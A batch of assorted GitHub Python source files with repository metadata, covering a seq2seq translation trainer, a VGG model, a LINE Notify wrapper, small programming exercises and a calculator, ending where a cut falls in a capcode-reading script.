just make up\n # some crap.\n if hasattr(fdef, 'arguments'):\n arg_names = [arg.variable.name for arg in fdef.arguments]\n else:\n arg_names = [name or '' for name in fdef.arg_names]\n\n args = [RuntimeArg(arg_name, arg_type, arg_kind, arg_pos_only)\n for arg_name, arg_kind, arg_type, arg_pos_only\n in zip(arg_names, fdef.arg_kinds, arg_types, arg_pos_onlys)]\n\n # We force certain dunder methods to return objects to support letting them\n # return NotImplemented. It also avoids some pointless boxing and unboxing,\n # since tp_richcompare needs an object anyways.\n if fdef.name in ('__eq__', '__ne__', '__lt__', '__gt__', '__le__', '__ge__'):\n ret = object_rprimitive\n return FuncSignature(args, ret)\n","repo_name":"Sarang0218/ResearchAndDevFor_Fardlang","sub_path":"venv/lib/python3.8/site-packages/mypyc/irbuild/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":7364,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"} +{"seq_id":"28306630271","text":"#!/usr/bin/python3\n\nclass JustCounter:\n __secretCount = 0 # 私有变量\n publicCount = 0 # 公开变量\n\n def count(self):\n self.__secretCount += 1\n self.publicCount += 1\n print(self.__secretCount)\n\n def getSecretCount(self): # 提供对应的public的方法\n return self.__secretCount\n\n\ncounter = JustCounter()\ncounter.count()\ncounter.count()\nprint(counter.publicCount)\n# print(counter.__secretCount) # 报错,实例不能访问私有变量\nprint(counter.getSecretCount()) # 提供对应的public的方法\n\n\n# 如果在子类中需要父类的构造方法就需要显示的调用父类的构造方法,或者不重写父类的构造方法。\n#\n# 子类不重写 __init__,实例化子类时,会自动调用父类定义的 __init__。\n# 如果重写了__init__ 时,实例化子类,就不会调用父类已经定义的 __init__\n# 如果重写了__init__ 时,要继承父类的构造方法,可以使用 super 关键字:\n#\n# super(子类,self).__init__(参数1,参数2,....)\n# 还有一种经典写法\n# 父类名称.__init__(self,参数1,参数2,...)\n","repo_name":"Melo15Zhang/python","sub_path":"7-17/oop/private.py","file_name":"private.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40856104438","text":"def extractWwwIsecainovelsCom(item):\n\t'''\n\tParser for 'www.isecainovels.com'\n\t'''\n\n\tvol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])\n\tif not (chp or vol) or \"preview\" in item['title'].lower():\n\t\treturn None\n\n\ttagmap = [\n\t\t('Upstart Pastry Chef', 'Upstart Pastry Chef ~Territory Management of a Genius Pâtissier~', 'translated'),\n\t\t('Sono Mono Nochi ni', 'That Person. Later on…', 'translated'),\n\t\t('Starship Officer Becomes Adventurer', 'The Starship Officer Becomes An Adventurer', 'translated'),\n\t\t('The Wolf Lord\\'s Lady', 'The Wolf Lord\\'s Lady', 'translated'),\n\t\t('Black Tea Specialist', 'I am The Black Tea Specialist Cheat of The Chivalric Order!', 'translated'),\n\t\t('PRC', 'PRC', 'translated'),\n\t\t('Loiterous', 'Loiterous', 'oel'),\n\t]\n\n\tfor tagname, name, tl_type in tagmap:\n\t\tif tagname in item['tags']:\n\t\t\treturn buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)\n\n\n\treturn False","repo_name":"fake-name/ReadableWebProxy","sub_path":"WebMirror/management/rss_parser_funcs/feed_parse_extractWwwIsecainovelsCom.py","file_name":"feed_parse_extractWwwIsecainovelsCom.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"91"} +{"seq_id":"43116766990","text":"import requests\n\nclass LINENotifyBot:\n API_URL = 'https://notify-api.line.me/api/notify'\n def __init__(self, access_token):\n self.__headers = {'Authorization': 'Bearer ' + access_token}\n\n def send(\n self, message,\n image=None, sticker_package_id=None, sticker_id=None,\n ):\n payload = {\n 'message': message,\n 'stickerPackageId': sticker_package_id,\n 'stickerId': sticker_id,\n }\n files = {}\n if image != None:\n files = {'imageFile': open(image, 'rb')}\n r = requests.post(\n LINENotifyBot.API_URL,\n headers=self.__headers,\n data=payload,\n files=files,\n )\n\n def send_message_stamp():\n bot = DIF_LineNotify.LINENotifyBot(access_token='ここにアクセストークンを追加') #アクセストークンは自分のを入力\n bot.send(\n message='Write Your Message', #ここは文章に関する記述\n sticker_package_id=1, #ここからはスタンプの送信についての記述\n sticker_id=13,\n )\n\n def send_message_stamp_image():\n bot = DIF_LineNotify.LINENotifyBot(access_token='ここにアクセストークンを追加') #アクセストークンは自分のを入力\n bot.send(\n message='Write Your Message', #ここは文章に関する記述\n image='test.png', # png or jpg これは画像の送信、画像が無いときはコメントアウトすること\n sticker_package_id=1, #ここからはスタンプの送信についての記述\n sticker_id=13,\n )\n","repo_name":"Naoki-Yoshizawa/ican2020","sub_path":"iCAN2020Python/DIF_LineNotify.py","file_name":"DIF_LineNotify.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"38298732113","text":"def foo(text,find,place):\n print(place+\" \"+find)\n number =text.find(find)\n if (number==-1):\n return\n else:\n text = text[0:number]+place+\" \"+find+text[number+len(find):len(text)]\n print(text)\n\ndef main():\n print(\"Írj be egy mondatot: \",end=\"\")\n text =str(input())\n print(\"Szeretnél valamelyik szó elé valamit rakni?(Y/N)\",end=\" \")\n character=str(input())\n if (character==\"N\"):\n print(text)\n else:\n print(\"Keresendö szó: \",end=\"\")\n find = str(input())\n print(\"A szó elé mit szeretnél rakni :\",end=\"\")\n place= str(input())\n foo(text,find,place)\n print(\"\"\"\\nHa jönn Szondi.akkor kéne nézni telefonhoz gyors töltött\n,kábelel,adapterrel. a Redmi Note 9 Prohoz és kettö db PEREMMENTES(Keretmentes) üvegfólia(Note 9 prohoz,\nHuawei Mate 20 Litehoz) Emag-rol , Code Vein Deluxe edition game 4660huf OKTOBER 10 85% DARK SOULS GAME WIFU SOULS. MINÉL HAMARABB\\n\"\"\")\n\nif __name__==\"__main__\":\n main()","repo_name":"CsukaDavid/BevProg","sub_path":"Gyakorlás/Homework_3_1.py","file_name":"Homework_3_1.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"71323119024","text":"#### https://pytorch.org/tutorials/intermediate/seq2seq_translation_tutorial.html\nfrom __future__ import unicode_literals, print_function, division\nfrom io import open\nimport unicodedata\nimport string\nimport re\nimport random\nimport os\nimport sys\n\nimport time\nimport math\n\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nimport matplotlib.ticker as ticker\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\n\nfrom bleu import *\nchencherry = SmoothingFunction()\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]='1,3,6,7'\n\n# Random Seed\ntorch.manual_seed(0)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(0)\nrandom.seed(0)\n\nSOS_token = 0\nEOS_token = 1\n\nMAX_LENGTH = 100\n\neng_prefixes = (\n \"i am \", \"i m \",\n \"he is\", \"he s \",\n \"she is\", \"she s \",\n \"you are\", \"you re \",\n \"we are\", \"we re \",\n \"they are\", \"they re \"\n)\n\n\n\ndef loadModel(model, path):\n # model.load_state_dict(torch.load('./model/classify_cifar10_49.pth'))\n model.load_state_dict(torch.load(path))\n return model\n\n\ndef saveModel(model, path):\n torch.save(model.state_dict(), path)\n\n\ndef convert_given(dictionary, data):\n s = \"\"\n for itm in range(0, data.shape[0]):\n s += str(dictionary[data[itm].item()]) + \" \"\n return s[:-1]\n\ndef convert(dictionary, data):\n s = \"\"\n # m = torch.max(data, dim=0)\n\n # print(data.shape)\n # print(m.shape)\n for itm in range(0, data.shape[0]):\n # print(torch.max(data[itm,:], dim=0)[1].detach().item())\n s += str(dictionary[torch.max(data[itm,:], dim=0)[1].detach().item()]) + \" \"\n return s[:-1]\n\n\nclass AttnDecoderRNN(nn.Module):\n def __init__(self, hidden_size, output_size, dropout_p=0.1, max_length=MAX_LENGTH):\n super(AttnDecoderRNN, self).__init__()\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.dropout_p = dropout_p\n self.max_length = max_length\n\n self.embedding = nn.Embedding(self.output_size, self.hidden_size)\n self.attn = nn.Linear(self.hidden_size * 2, self.max_length)\n self.attn_combine = nn.Linear(self.hidden_size * 2, self.hidden_size)\n self.dropout = nn.Dropout(self.dropout_p)\n self.gru = nn.GRU(self.hidden_size, self.hidden_size)\n # self.lstm = nn.LSTM(self.hidden_size, self.hidden_size)\n self.out = nn.Linear(self.hidden_size, self.output_size)\n\n def forward(self, input, hidden, encoder_outputs):\n embedded = self.embedding(input).view(1, 1, -1)\n embedded = self.dropout(embedded)\n\n attn_weights = F.softmax(\n self.attn(torch.cat((embedded[0], hidden[0]), 1)), dim=1)\n attn_applied = torch.bmm(attn_weights.unsqueeze(0),\n encoder_outputs.unsqueeze(0))\n\n output = torch.cat((embedded[0], attn_applied[0]), 1)\n output = self.attn_combine(output).unsqueeze(0)\n\n output = F.relu(output)\n output, hidden = self.gru(output, hidden)\n # output, hidden = self.lstm(output, hidden)\n\n output = F.log_softmax(self.out(output[0]), dim=1)\n return output, hidden, attn_weights\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\nclass DecoderRNN(nn.Module):\n def __init__(self, hidden_size, output_size):\n super(DecoderRNN, self).__init__()\n self.hidden_size = hidden_size\n\n self.embedding = nn.Embedding(output_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size)\n # self.lstm = nn.LSTM(hidden_size, hidden_size)\n self.out = nn.Linear(hidden_size, output_size)\n self.softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input, hidden):\n output = self.embedding(input).view(1, 1, -1)\n output = F.relu(output)\n output, hidden = self.gru(output, hidden)\n # output, hidden = self.lstm(output, hidden)\n output = self.softmax(self.out(output[0]))\n return output, hidden\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\nclass EncoderRNN(nn.Module):\n def __init__(self, input_size, hidden_size):\n super(EncoderRNN, self).__init__()\n self.hidden_size = hidden_size\n\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size)\n # self.lstm = nn.LSTM(hidden_size, hidden_size)\n\n def forward(self, input, hidden):\n embedded = self.embedding(input).view(1, 1, -1)\n output = embedded\n output, hidden = self.gru(output, hidden)\n # output, hidden = self.lstm(output, hidden.unsqueeze(0))\n return output, hidden\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\ndef filterPair(p):\n return len(p[0].split(' ')) < MAX_LENGTH and \\\n len(p[1].split(' ')) < MAX_LENGTH #and \\\n # p[1].startswith(eng_prefixes)\n\n\ndef filterPairs(pairs):\n return [pair for pair in pairs if filterPair(pair)]\n\n\n\nclass Lang:\n def __init__(self, name):\n self.name = name\n self.word2index = {}\n self.word2count = {}\n self.index2word = {0: \"SOS\", 1: \"EOS\"}\n self.n_words = 2 # Count SOS and EOS\n\n def addSentence(self, sentence):\n for word in sentence.split(' '):\n self.addWord(word)\n\n def addWord(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n\n\n# Turn a Unicode string to plain ASCII, thanks to\n# https://stackoverflow.com/a/518232/2809427\ndef unicodeToAscii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n )\n\n\n# Lowercase, trim, and remove non-letter characters\ndef normalizeString(s):\n s = unicodeToAscii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n return s\n\n\ndef readLangs(lang1, lang2, reverse=False):\n print(\"Reading lines...\")\n\n # Read the file and split into lines\n train_lines = open('data/%s-%s-training.txt' % (lang1, lang2), encoding='utf-8').read().strip().split('\\n')[::10]\n valid_lines = open('data/%s-%s-validation.txt' % (lang1, lang2), encoding='utf-8').read().strip().split('\\n')\n\n # Split every line into pairs and normalize\n train_pairs = [[normalizeString(s) for s in l.split('\\t')] for l in train_lines]\n valid_pairs = [[normalizeString(s) for s in l.split('\\t')] for l in valid_lines]\n\n # Reverse pairs, make Lang instances\n if reverse:\n train_pairs = [list(reversed(p)) for p in train_pairs]\n valid_pairs = [list(reversed(p)) for p in valid_pairs]\n input_lang = Lang(lang2)\n output_lang = Lang(lang1)\n else:\n input_lang = Lang(lang1)\n output_lang = Lang(lang2)\n\n return input_lang, output_lang, train_pairs, valid_pairs\n\n\ndef prepareData(lang1, lang2, reverse=False):\n input_lang, output_lang, train_pairs, valid_pairs = readLangs(lang1, lang2, reverse)\n print(\"Read %s sentence pairs (training)\" % len(train_pairs))\n print(\"Read %s sentence pairs (validation)\" % len(valid_pairs))\n train_pairs = filterPairs(train_pairs)\n valid_pairs = filterPairs(valid_pairs)\n print(\"Trimmed to %s sentence pairs (training)\" % len(train_pairs))\n print(\"Trimmed to %s sentence pairs (validation)\" % len(valid_pairs))\n print(\"Counting words...\")\n for pair in train_pairs:\n input_lang.addSentence(pair[0])\n output_lang.addSentence(pair[1])\n\n for pair in valid_pairs:\n input_lang.addSentence(pair[0])\n output_lang.addSentence(pair[1])\n\n print(\"Counted words:\")\n print(input_lang.name, input_lang.n_words)\n print(output_lang.name, output_lang.n_words)\n return input_lang, output_lang, train_pairs, valid_pairs\n\n\ndef indexesFromSentence(lang, sentence):\n return [lang.word2index[word] for word in sentence.split(' ')]\n\n\ndef tensorFromSentence(lang, sentence):\n indexes = indexesFromSentence(lang, sentence)\n indexes.append(EOS_token)\n return torch.tensor(indexes, dtype=torch.long, device=device).view(-1, 1)\n\n\ndef tensorsFromPair(pair):\n input_tensor = tensorFromSentence(input_lang, pair[0])\n target_tensor = tensorFromSentence(output_lang, pair[1])\n return (input_tensor, target_tensor)\n\n\nteacher_forcing_ratio = 0.5\n\n\ndef train(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion, lang1, lang2, max_length=MAX_LENGTH):\n encoder_hidden = encoder.initHidden()\n\n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n input_length = input_tensor.size(0)\n target_length = target_tensor.size(0)\n\n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n loss = 0\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(\n input_tensor[ei], encoder_hidden)\n encoder_outputs[ei] = encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=device)\n\n decoder_hidden = encoder_hidden\n\n use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n\n original = target_tensor \n translated = torch.zeros((target_length, len(lang2.index2word.keys())))\n if use_teacher_forcing:\n # Teacher forcing: Feed the target as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n\n # ten.append(decoder_output)\n translated[di,:] = decoder_output\n\n loss += criterion(decoder_output, target_tensor[di])\n decoder_input = target_tensor[di] # Teacher forcing\n\n else:\n # Without teacher forcing: use its own predictions as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n\n # ten.append(decoder_output)\n translated[di,:] = decoder_output\n\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n\n loss += criterion(decoder_output, target_tensor[di])\n if decoder_input.item() == EOS_token:\n break\n\n # print(translated.shape)\n # print(translated)\n\n # print(original.shape)\n # print(original)\n\n # print(decoder_output.shape)\n # print(convert(lang2.index2word, translated))\n # print(convert_given(lang2.index2word, original))\n \n hypothesis = convert(lang2.index2word, translated)\n reference = [convert_given(lang2.index2word, original)]\n # print(\"BLEU: \", sentence_bleu(reference, hypothesis, smoothing_function=chencherry.method1))\n\n loss.backward()\n\n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return loss.item() / target_length, hypothesis, reference, encoder, decoder\n\n\ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n es = s / (percent)\n rs = es - s\n return '%s (- %s)' % (asMinutes(s), asMinutes(rs))\n\ndef validation(encoder, decoder, lang1, lang2):\n\n start = time.time()\n plot_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n # encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n # decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n validation_pairs = [tensorsFromPair(random.choice(valid_pairs))\n for i in range(n_iters)]\n criterion = nn.NLLLoss()\n\n n_iters = len(valid_pairs)\n bleu = 0\n for iter in range(1, n_iters + 1):\n valid_pair = validation_pairs[iter - 1]\n input_tensor = valid_pair[0]\n target_tensor = valid_pair[1]\n\n loss, hypothesis, reference, encoder, decoder = train(input_tensor, target_tensor, encoder,\n decoder, encoder_optimizer, decoder_optimizer, criterion, lang1, lang2)\n print_loss_total += loss\n plot_loss_total += loss\n\n bleu += sentence_bleu(reference, hypothesis, smoothing_function=chencherry.method1)\n\n print('(VALID) %s (%d %d%%) loss: %.4f bleu: %.4f' % (timeSince(start, iter / n_iters), iter, iter / n_iters * 100, print_loss_avg, bleu / print_every))\n\n # showPlot(plot_losses)\n\n\n # for index in pairs:\n # evaluate(encoder, decoder, pairs[index])\n\ndef trainIters(encoder, decoder, n_iters, lang1, lang2, print_every=1000, plot_every=100, learning_rate=0.01): # original learning_rate .01\n start = time.time()\n plot_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n training_pairs = [tensorsFromPair(random.choice(train_pairs))\n for i in range(n_iters)]\n criterion = nn.NLLLoss()\n\n bleu = 0\n for iter in range(1, n_iters + 1):\n training_pair = training_pairs[iter - 1]\n input_tensor = training_pair[0]\n target_tensor = training_pair[1]\n\n loss, hypothesis, reference, encoder, decoder = train(input_tensor, target_tensor, encoder,\n decoder, encoder_optimizer, decoder_optimizer, criterion, lang1, lang2)\n print_loss_total += loss\n plot_loss_total += loss\n\n bleu += sentence_bleu(reference, hypothesis, smoothing_function=chencherry.method1)\n\n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('(TRAIN) %s (%d %d%%) loss: %.4f bleu: %.4f' % (timeSince(start, iter / n_iters), iter, iter / n_iters * 100, print_loss_avg, bleu / print_every))\n\n saveModel(encoder, \"./model/encoder-\" + str(iter) + \"-\" + str(bleu/iter) + \".pth\")\n saveModel(decoder, \"./model/decoder-\"+ str(iter) + \"-\" + str(bleu/iter) + \".pth\")\n\n bleu = 0\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n showPlot(plot_losses)\n\ndef showPlot(points):\n plt.figure()\n fig, ax = plt.subplots()\n # this locator puts ticks at regular intervals\n loc = ticker.MultipleLocator(base=0.2)\n ax.yaxis.set_major_locator(loc)\n plt.plot(points)\n\n\ndef evaluate(encoder, decoder, sentence, max_length=MAX_LENGTH):\n with torch.no_grad():\n input_tensor = tensorFromSentence(input_lang, sentence)\n input_length = input_tensor.size()[0]\n encoder_hidden = encoder.initHidden()\n\n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei],\n encoder_hidden)\n encoder_outputs[ei] += encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=device) # SOS\n\n decoder_hidden = encoder_hidden\n\n decoded_words = []\n decoder_attentions = torch.zeros(max_length, max_length)\n\n for di in range(max_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n decoder_attentions[di] = decoder_attention.data\n topv, topi = decoder_output.data.topk(1)\n if topi.item() == EOS_token:\n decoded_words.append('')\n break\n else:\n decoded_words.append(output_lang.index2word[topi.item()])\n\n decoder_input = topi.squeeze().detach()\n\n return decoded_words, decoder_attentions[:di + 1]\n\n\ndef evaluateSet(encoder, decoder, setlist):\n mean_bleu = 0\n bleu = 0\n for i in range(len(setlist)):\n pair = setlist[i]\n print('>', pair[0])\n print('=', pair[1])\n output_words, attentions = evaluate(encoder, decoder, pair[0])\n output_sentence = ' '.join(output_words)\n\n # bleu = sentence_bleu(reference, hypothesis, smoothing_function=chencherry.method1)\n # mean_bleu += bleu\n\n print('<', output_sentence)\n print('~ bleu: ', bleu)\n print('\\n\\n~ mean bleu: ', mean_bleu/len(setlist))\n\n\n\ndef evaluateRandomly(encoder, decoder, n=10):\n for i in range(n):\n pair = random.choice(pairs)\n print('>', pair[0])\n print('=', pair[1])\n output_words, attentions = evaluate(encoder, decoder, pair[0])\n output_sentence = ' '.join(output_words)\n print('<', output_sentence)\n print('')\n\n\ninput_lang, output_lang, train_pairs, valid_pairs = prepareData('eng', 'ger', False)\nprint(random.choice(train_pairs))\n\nhidden_size = 256\nencoder1 = EncoderRNN(input_lang.n_words, hidden_size).to(device)\nattn_decoder1 = AttnDecoderRNN(hidden_size, output_lang.n_words, dropout_p=0.1).to(device)\n\nif len(sys.argv) > 1 and sys.argv[1] == 'train':\n trainIters(encoder1, attn_decoder1, 75000, input_lang, output_lang, print_every=5000)\nelif len(sys.argv) > 1 and sys.argv[1] == 'test':\n encoder1 = loadModel(encoder1, \"./model/encoder-best.pth\")\n attn_decoder1 = loadModel(attn_decoder1, \"./model/decoder-best.pth\")\n # validation(encoder1, attn_decoder1, input_lang, output_lang)\n evaluateSet(encoder1, attn_decoder1, valid_pairs)\nelif len(sys.argv) > 1 and sys.argv[1] == 'translate':\n translation(encoder1, attn_decoder1, input_lang, output_lang)\n","repo_name":"tym0027/eece7398-hw3","sub_path":"NMT.py","file_name":"NMT.py","file_ext":"py","file_size_in_byte":18052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25643102643","text":"from tensorflow.keras import layers, models, Model, Sequential\n\n\nclass VGGNet(object):\n def __init__(self, img_height, img_width, class_num, name):\n self.img_height = img_height\n self.img_width = img_width\n self.class_num = class_num\n self.name = name\n\n def vgg_arch(self, feature):\n \"\"\"\n VGG Model核心模块\n :param feature: 特征层\n :return: Model\n \"\"\"\n input_image = layers.Input(shape=(self.img_height, self.img_width, 3), dtype='float32')\n x = feature(input_image)\n x = layers.Flatten()(x)\n x = layers.Dropout(rate=0.5)(x)\n x = layers.Dense(4096, activation='relu')(x)\n x = layers.Dropout(rate=0.5)(x)\n x = layers.Dense(4096, activation='relu')(x)\n x = layers.Dense(self.class_num)(x)\n output = layers.Softmax()(x)\n model = models.Model(inputs=input_image, outputs=output)\n return model\n\n def features(self, cfg):\n \"\"\"\n VGG Modle特征层\n :param cfg: 特征层参数配置\n :return: 特征层\n \"\"\"\n feature_layers = []\n for v in cfg:\n if v == \"M\":\n feature_layers.append(layers.MaxPool2D(pool_size=2, strides=2))\n else:\n conv2d = layers.Conv2D(v, kernel_size=3, padding='same', activation='relu')\n feature_layers.append(conv2d)\n return Sequential(feature_layers, name='feature')\n\n def vgg(self):\n \"\"\"\n VGG Model\n :param model_name:VGG系列模型的名称\n :return: model\n \"\"\"\n try:\n cfg = cfgs[self.name]\n except:\n print(f'Warning: model number {self.name} not supported.')\n exit(-1)\n model = self.vgg_arch(self.features(cfg))\n\n return model\n\n\ncfgs = {\n 'vgg11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'vgg13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'vgg16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],\n 'vgg19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],\n}","repo_name":"KDD2018/Machine-Learning","sub_path":"cv/CNN_Model/VGGNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"3884913907","text":"import sys\nimport math\nname=input(\"Please enter your name\")\nwhile name.isalpha()==False or len(name)<4 :\n if ' ' in name :\n break\n else:\n print(\"THE NAME YOU ENTERED IS INCORRECT\")\n name=input('Enter name again')\nprint(\"WELCOME! NOW YOU ARE READY TO USE CALCULATOR \\n YOU HAVE FOLLOWING OPTIONS\")\ndoagain='yes'\nwhile doagain=='yes':\n print(\"Select operation\")\n print(\"1.Add 2.Subtract\")\n print(\"3.Multiply 4.Modulous\")\n print(\"5.square root 6. Square\")\n print(\"7.division\")\n select=int(input(\"your choice operation 1/2/3/4/5/6/7 \"))\n if select==1:\n num1=int(input(\"Enter your number\"))\n addagain='yes'\n while addagain=='yes':\n num2=int(input(\"Enter your number again\"))\n result=num1+num2\n addagain=input(\"do you want to add more number\")\n print(\"The sum of the given number is \",result)\n elif select==2:\n a=int(input(\"Enter your first number\"))\n subtractagain='yes'\n a=0\n b=0\n while subtractagain=='yes':\n b=int(input(\"Enter the number you want to subtract\"))\n c=a-b\n subtractagain=input('Do you want to subtract more number')\n print(\"The resulrt is\",c)\n elif select==3:\n num1 = int(input(\"Enter the first number\"))\n mulagain='yes'\n while mulagain=='yes':\n num2=int(input(\"Enter your number \"))\n product=num1*num2\n mulagain=input(\"do you want to multiply more number\")\n print(\"the product of the given number is\",product)\n elif select==4:\n num1 = int(input(\"Enter the first number\"))\n num2 = int(input(\"Enter the second number\"))\n rem=num1%num2\n print(\"The remainder of the given division number is\",rem)\n elif select==5:\n num1 = int(input(\"Enter the number\"))\n sqroot=math.sqrt(num1)\n print(\"The square root of the given number is \",sqroot)\n elif select==6:\n num1 = int(input(\"Enter the number\"))\n square=num1*num1\n square=int(square)\n print(\"The square of the given number is \",square)\n elif select==7:\n num1 = int(input(\"Enter the first number\"))\n num2 = int(input(\"Enter the second number\"))\n quoitent=num1/num2\n print(\"The Quoitent of the given number is\",float(quoitent))\n else:\n sys.exit(\"OPERATION OUT OF THE RANGE\")\n doagain=input(\"\\nYou want to do other calculation:(yes/no) \")\n","repo_name":"Nishan52/first-group-project","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"42958239986","text":"# 11653번 소인수분해\n# https://www.acmicpc.net/problem/11653\n\nn = int(input())\n\nwhile n != 1:\n for i in range(2, n+1):\n if n % i == 0:\n n = n // i\n print(i)\n break\n","repo_name":"Johyonghoon/algorithm","sub_path":"backjoon/number_theory/11653.py","file_name":"11653.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72108042222","text":"from time import time\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.callbacks import TensorBoard\n\nmodel = Sequential()\n\nmodel.add(Dense(10, input_shape=(784,)))\nmodel.add(Activation('softmax'))\n\nmodel.compile(optimizer='sgd', loss='categorical_crossentropy')\n\ntensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\n\nmodel.fit(partial_x_train,\n partial_y_train,\n epochs=1000,\n batch_size=1000,\n validation_data=(x_val, y_val),\n verbose=1, callbacks=[tensorboard])\n\n","repo_name":"abal6725/TensorFlow","sub_path":"TensorBoard.py","file_name":"TensorBoard.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72076065264","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 19 14:21:35 2022\r\n\r\n@author: Mr Kakarotto\r\n\"\"\"\r\n\r\nimport numpy as np\r\ndata=[1,2,2,3,1,4,6,9,20,4,4,9,10,10,12,12,13,13,14,13]\r\ndata1=sorted(data)\r\nprint(\"Sorted data1 is\",data1)\r\nx=[]\r\ny=[] \r\nfor i in range(len(data1)):\r\n if data1[i-1] != data1[i]:\r\n x.append(data1[i])\r\nprint(\"The value of x is\",x)\r\n\r\nfor i in range(len(x)):\r\n k=0\r\n for j in range(len(data1)):\r\n if x[i]==data1[j]:\r\n k=k+1\r\n y.append(k)\r\nprint(\"The value of y is\",y) \r\n\r\nmew=[]\r\nfor i in range(4):\r\n z=0\r\n for j in range(len(x)):\r\n z=z+((x[j]**i*y[j])/np.sum(y))\r\n mew.append(z)\r\nprint(\"The value of mew is\",mew) \r\n \r\n","repo_name":"Shafiq5472/UNi-work","sub_path":"uni work/mew calculation from raw data.py","file_name":"mew calculation from raw data.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"74944404143","text":"import pandas as pd\nfrom geocode import get_coordinates_from_string\nfrom send_message import send_body_message, send_location_message\nimport time\nimport json\n\n\n# import capcodes from json file\nwith open(\"capcodes-json.json\", \"r\") as file:\n 